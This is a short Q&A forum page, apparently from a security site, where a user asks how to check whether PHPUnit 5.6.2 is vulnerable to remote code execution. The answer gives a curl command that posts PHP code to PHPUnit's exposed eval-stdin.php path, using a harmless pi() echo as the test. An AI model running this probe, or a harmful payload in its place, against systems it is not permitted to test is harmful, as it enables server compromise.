Techbypass always tries to help you to learn about recent vulnerabilities and exploitations.

Learn and share your security findings and help others to secure their digital assets.

Need any help mail to [email protected]

0 votes
Lets I've installed PHPUnit version is 5.6.2. Which is vulnerable to Remote Code Execution. How can I check this vulnerability?
by (111 points)

1 Answer

0 votes

Let's you have that vulnerable PHPUnit in http://localhost/vendor/phpunit/.

So you can check by printing the value of pi using this cURL command.

$ curl --data "<?php echo(pi());" http://localhost/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
by (269 points)